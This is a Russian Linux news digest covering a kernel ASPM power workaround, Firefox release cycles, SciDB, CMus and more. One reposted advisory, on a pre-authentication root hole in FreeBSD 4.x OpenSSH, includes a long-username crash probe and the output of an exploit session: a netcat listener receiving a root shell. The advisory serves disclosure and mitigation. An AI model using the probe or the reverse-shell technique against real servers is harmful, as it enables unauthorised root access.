Скрыть

Вышел одиннадцатый номер журнала UserAndLINUX. Тема номера – Обмен мгновенными сообщениями: есть ли достойные приложения под Линукс?

В номере: • Обзоры IM-клиентов, приложений для общения по VoIP, VVoIP, FoIP, sip-, XMPP/Jabber-, ICQ- и twitter-клиентов; • Google платит русскому студенту за ошибки в Chrome; • Русский хакер вскрыл секретный протокол Skype; • ICQ отправилась покорять Linux; • Обзоры рынка мобильных устройств; • 10 интернет-рекордов; • Зеленые Андроиды наводнили метро!; • 10 наиболее распространенных паролей iPhone; • Рейтинг самых опасных ошибок при создании программ; • ООН против лишения права на Интернет; • 15-летний выходец из Украины продал программу крупной IT-компании; • Исследование показало, что в составе GNU/Linux всего 8 процентов GNU; • Первые хромбуки: кто уже выпускает?; • LexisNexis: наше решение с открытым кодом в 4 раза быстрее, чем Hadoop.

PDF - 56 страниц, 4.9Мб Печатный - 100 стр.

>>> Подробнее

Скрыть

В используемом в Ubuntu 11.04 и Fedora 15 Linux-ядре 2.6.38, а также в 2.6.39 и тестовых версиях 3.0-rc наблюдается возрастание энергопотребления на 10-30%. Кроме Phoronix подобная тенденция наблюдалась в тестах издания Tom's Hardware.

По предварительным данным, одна из приводивших к повышению энергопотребления проблем связана с изменением в коде поддержки ASPM (Active-State Power Management) для плат PCI Express, который стал активироваться только при сигнализации о поддержке ASPM со стороны BIOS (определенные реализации BIOS указывают, что ASPM не поддерживается, но все равно инициализирует данную поддержку для некоторых устройств).

Экспериментальным путем был выявлен обходной путь решения проблемы, который позволяет уменьшить энергопотребление в среднем на 15%. Для решения проблемы систему следует загрузить передав ядру в интерфейсе загрузчика GRUB параметр "pcie_aspm=force".

В Debian для grub2 нужно следующее:

1. Исправить в файле /etc/default/grub строку

GRUB_CMDLINE_LINUX="pcie_aspm=force"

2. Запустить update-grub

Все операции естественно от рута

>>> Подробнее

Скрыть

Тихо и незаметно в списке рассылки full-disclosure представлена критическая уязвимость в используемой во FreeBSD 4.x версии OpenSSH, позволяющая удаленному злоумышленнику без аутентификации получить root-доступ к системе. Уже создан и публично опубликован эксплоит, позволяющий получить привилегированный shell на подверженных уязвимости серверах.

Уязвимость проявляется для протоколов SSH1 и SSH2. Проблема вызвана ошибкой в реализации аутентификации с использованием PAM на платформе FreeBSD. Проблема присутствует в функции "pam_thread()" из файла auth2-pam-freebsd.c.  http://www.freebsd.org/cgi/cvsweb.cgi/src/crypto/openssh/Attic/auth2-pam-freebsd.c Начиная с версии FreeBSD 5.2 содержащий уязвимость файл auth2-pam-freebsd.c был заменен новой реализацией, т.е. с большой долей вероятности можно утверждать, что новые версии FreeBSD проблеме не подвержены. 100% уверенности пока нет, так как точно не ясно, не перекочевал ли проблемный код в какие-либо библиотеки PAM или сторонние реализации OpenSSH, используемые и поныне. Детальный аудит ещё предстоит провести.

Ошибка проявляется при передаче слишком длинного имени пользователя. Простой способ проверить наличие уязвимости - попытаться обратиться к своему серверу, указав логин порядка 100 символов. Например: "ssh -l`perl -e 'print "A" x 100'` хост", в случае проблемы, можно наблюдать крах рабочего процесса sshd и вывод в лог /var/log/messages сообщения "/kernel: pid N (sshd), uid 0: exited on signal 11 (core dumped)". Изучение core-дампа показало, что проблема подвержена эксплуатации, так как атакующий может контролировать указатель перехода и позиционировать его на shellcode. Прототип рабочего эксплоита был успешно создан путем небольшой модификации кода ssh-клиента из пакета OpenSSH 5.8p2.

$ ./ssh -1 192.168.1.1 $ nc -v -l -p 10000 listening on [any] 10000 ... 192.168.1.1: inverse host lookup failed: Unknown host connect to [192.168.1.2] from (UNKNOWN) [192.168.1.1] 1038 uname -a FreeBSD h4x.localdomain 4.11-RELEASE FreeBSD 4.11-RELEASE #0: Fri Jan 21 17:21:22 GMT 2005 /GENERIC i386

id

uid=0(root) gid=0(wheel) groups=0(wheel)

Поддержка ветки FreeBSD 4.x прекращена ещё в 2007 году, но данная версия все еще используется на некоторых серверах в сети. Пользователям версии FreeBSD 4.x рекомендуется срочно обновить OpenSSH до более новой версии. В качестве обходного пути решения проблемы следует разрешить через пакетный фильтр доступ по SSH только для доверительных хостов и отключить поддержку PAM, указав в настройках "ChallengeResponseAuthentication no". Информации о возможности поражения других операционных систем, использующих устаревшие версии OpenSSH с реализацией поддержки PAM от проекта FreeBSD, пока нет.

Тянуто c Opennet.ru

>>> Подробнее

Скрыть

Семь сайтов были заблокированы сроком на месяц (с начала мая до начала июня) по заявлению «Централ партнершип» (ЦПШ), рассказала «Ведомостям» пресс-секретарь управления «К» (БСТМ МВД России) Лариса Жукова.

...

Подчиняться полицейским готовы не все. Блокировали доступ к пиратским сайтам только ООО «Ай-пи-ти-пи» (IPTP Networks), ЗАО «РетнНет» (RETN), ООО «Рускомнет», хотя предписание было направлено и другим магистральным провайдерам — ОАО «Комкор», ЗАО «Компания «Транстелеком» (ТТК), ОАО «Вымпелком», ОАО «МТС», ОАО «Ростелеком» и ЗАО «Раском», рассказала Жукова. По ее словам, управление «К» собирается жаловаться в Роскомнадзор на отказавшихся сотрудничать провайдеров МТС, «Раском», «Комкор» и ТТК, а также на «Вымпелком» и «Ростелеком», не ответивших полиции.

...

>>> Подробнее

Скрыть

Учебник «Learning Go» подойдет для тех, кому мало официального Go Tutorial, но при этом лень читать спецификацию языка.

Книга свёрстана на LaTeX и распространяется под CC BY-NC-SA 3.0. Автор (Miek Gieben) периодически дополняет и редактирует книгу.

Отсюда можно выкачать последние редакции указанного учебника в PDF:

 http://www.miek.nl/files/go/

>>> Подробнее

Скрыть

В небольшой заметке описывается, как подключать под юникс этот небольшой источник бесперебойного питания

>>> Подробнее

Скрыть

Интерес корпоративных пользователей к Firefox стал снижаться после перехода проекта Mozilla на 16-недельный цикл подготовки релизов, в соответствии с которым новые значительные релизы будут выпускаться каждые 6 недель, заменяя собой прошлые выпуски, поддержка которых сразу прекращается. Несмотря на то, что обычные пользователи с радостью восприняли более оперативную реализацию новшеств, для корпораций новшества находятся на втором плане, главное для них обеспечение длительной поддержки стабильных версий.

\cut{Читать далее}

Например, многие корпорации до сих пор используют Firefox 3.6 и только планируют переход на Firefox 4. При обновлении браузера до новой значительной версии недостаточно просто установить сотрудникам обновление, необходимо провести обучение персонала, обновить документацию, убедиться в работоспособности всех используемых дополнений, досконально протестировать работу всех корпоративных ресурсов, устранить все проблемные моменты и только после этого начать внедрение. При выходе новой значительной версии каждые полтора месяца с прекращением поддержки прошлого выпуска смысл использования Firefox корпорациями теряется, процесс поддержки становится излишне обременительным (например, в больших корпорациях только согласование перехода на новую версию может занять месяцы).

В настоящее время корпорации оказались перед непростым выбором: перейти на Firefox 4 и закрыть глаза на исправление уязвимостей, смириться с возможными проблемами в работе внутренних web-приложений или оставаться на ветке Firefox 3.6.x. Ни один из этих вариантов не является приемлемым. Компании не готовы пойти на риск столкнуться с ситуацией, когда критичное для бизнес-процесса дополнение перестанет работать в новой версии, а старая версия уже не будет поддерживаться производителем, или смириться с возможным наличием неисправленных, но известных злоумышленникам, уязвимостей.

Несмотря на недовольство корпораций организация Mozilla не намерена отступать от более динамичного цикла развития в угоду особенностей корпоративной политики. Firefox ориентируется на конечных пользователей, желающих быть на пике инноваций в Web. В настоящее время Web-технологии развиваются слишком интенсивно и Mozilla нацелена на обеспечение максимального удобства для пользователей и поддержку новых веяний в Web. По мнению Mozilla, оптимальным вариантом как для пользователей так и для Web является выпуск небольших, но частых релизов, сочетающих устранение проблем безопасности, исправление ошибок и реализацию небольшой порции новшеств. Отныне, одна ветка Firefox будет заменять другую: версия Firefox 5 рассматривается как обновление к Firefox 4, а Firefox 6 заменит собой Firefox 5, без каких-либо промежуточных корректирующих релизов. Отдельных обновлений для ветки Firefox 4.x больше выпущено не будет.

>>> Подробнее

Скрыть

на CPAN Сергей Алейников выпустил модуль языка perl , который позволяет отслеживать содержимое функций, что очень удобно при отладке запутанного кода.

perl


use Devel::PrettyTrace;
       
sub foo{
  bar();
}

sub bar{
  bt;
}

foo(1, "b");

#и вывод
       
main::bar() called at foo.pl line 4
main::foo(
[0] 1,
[1] "b"
) called at foo.pl line 10
 

>>> Подробнее

Скрыть CMus — лёгкий, быстрый и в тоже время мощный консольный аудиоплеер с множеством интересных возможностей. Название плеера происходит от сокращения словосочетания "C* Music player". Написан плеер на C (Си) и используя ncurses (библиотека для управления вводом/выводом на терминал).

CMus поддерживает создание/открытие плейлистов (с мощными фильтрами), очерёдность воспроизведения и простой файловый браузер (обзор директорий). А одной из отличительных особенностей CMus является то, что управление плеером реализовано аналогично управлению в Vi (один из мощнейших текстовых редакторов).

Интерфейс CMus поддерживает настройку цветов и имеет семь режимов (переключаемых цифрами 1, 2, 3, 4, 5, 6 и 7). Первый режим (режим запускаемый по умолчанию) включает в себя две вкладки, на одной отображаются альбомы/исполнители, а на другой список композиций выделенного альбома. Вторая вкладка является сортированной библиотекой (плейлистом/полный список треков), позволяющим переходить по трекам.

В третьей вкладке CMus находится редактируемый список воспроизведения (плейлист), четвёртая вкладка отображает очередь воспроизведения. В пятой вкладке файловый браузер, в шестой фильтры/список фильтров заданных пользователем. Седьмая вкладка настройки, в ней показаны клавиатурные сочетания и команды для управления плеером.

CMus поддерживает практически все популярные (и не очень) аудиоформаты, включая: FLAC, Ogg/Vorbis, MP3 (libmad), Wav, WMA (ffmpeg), MOD, S3M, MPEG-4/AAC (libmp4v2, libfaad2) и др...

В CMus есть функция Gapless Playback (воспроизведение без пауз между треками), функция ReplayGain (воспроизведение всех файлов медиа-библиотеки с однородной громкостью), показ информации об исполнителе/альбоме/треке в виде древа, сложные фильтры имён для воспроизводимых композиций, воспроизведение потокового вещания MP3, Ogg, AAC (Shoutcast/Icecast), поддержка/интеграция с Last.fm или Libre.fm (с помощью скриптов) и многое другое...

Лицензия: GNU General Public License (GPL)
>>> Подробнее

Скрыть

Объявлено о выходе SciDB 11.06, первого стабильного релиза проекта по созданию свободной СУБД для использования в области обработки научных данных, полученных в результате экспериментов и наблюдений. В качестве примеров областей, в которых может использоваться СУБД, называется хранение и анализ наблюдений в оптической и радио астрономии, сейсмологии, генетике, океанографии, геологии, климатических и экологических наблюдений. Кроме научного применения SciDB может использоваться для обработки статистики работы различных сенсоров в нефтедобывающей отрасли и медицинских учреждениях, выполнения финансовой аналитики. СУБД спроектирована для анализа огромных массивов данных (тысячи петабайт) и изначально поддерживает кластеризацию, масштабируясь от одного сервера до десятков тысяч узлов. Код SciDB распространяется в рамках лицензии GPLv3.

Примечательно, что инициатором проекта SciDB выступил Майкл Стоунбрейкер, создатель СУБД Ingres, VoltDB и PostgreSQL, а в разработку были вовлечены российские научные учреждения, такие как НИИСИ РАН и ГАИШ МГУ (сотрудники данных организаций давно участвуют в разработке СУБД PostgreSQL). SciDB непохожа на классические СУБД и в ущерб поддержке некоторых привычных возможностей оптимизирована для обработки и анализа "сырых" данных, которые интенсивно читаются, но почти не изменяются. СУБД не рассчитана на обработку транзакций в реальном времени (OLTP), не поддерживает ACID (атомарность, непротиворечивость, изоляция, долговечность) и журналирование, обеспечивая транзакции лишь на минимальном уровне.

Возможности SciDB сосредоточены вокруг сложной аналитики, для которой стандартная реляционная модель оказывается неэффективной - хранилище оптимизировано для единовременной записи мало структурированных данных и их последующего интенсивного чтения. Вместо добавления отдельных строк, применяется подход загрузки сразу больших порций данных. Хранение данных организовано в виде многомерных вложенных массивов, для обработки которых вместо SQL задействованы языки AQL (Array Query Language) и AFL (Array Functional Language).

AQL напоминает SQL, но предназначен для формирования запросов к многомерным массивам, вместо множеств, т.е. позволяющий учитывать соседние позиции элементов при помощи оператора REGRID, выполняющего действия сходные с MapReduce. Для обработки данных внутри СУБД подготовлен язык AFL, которые позволяет создавать встраиваемые процедуры. Пример обработки данных подробно описан в данной статье.

Важной особенностью SciDB является наличие поддержки версионного контроля данных и учета всех операций над ними, что позволяет отследить все манипуляции, выполняемые над данными, и при необходимости в точности повторить аналитический запрос (над тем же набором данных в состоянии на момент прошлого запроса) или выполнить его в измененном виде (откорректировать алгоритм). Подобный подход, в сочетании с гибкими средствами обмена данными (экспорт не только данных, но и истории операций над ними), позволяет сторонним исследователям на своих локальных системах повторять эксперименты других групп. Аналитические дополнения к SciDB можно разрабатывать на языках, подобных C++ и Python. Присутствуют готовые модули для интеграции с такими вычислительными пакетами, как R, Matlab и IDL, позволяя использовать уже существующие алгоритмы обработки данных.

 http://www.scidb.org/news/20110615.php

тотальная копипаста с Opennet.ru

>>> Подробнее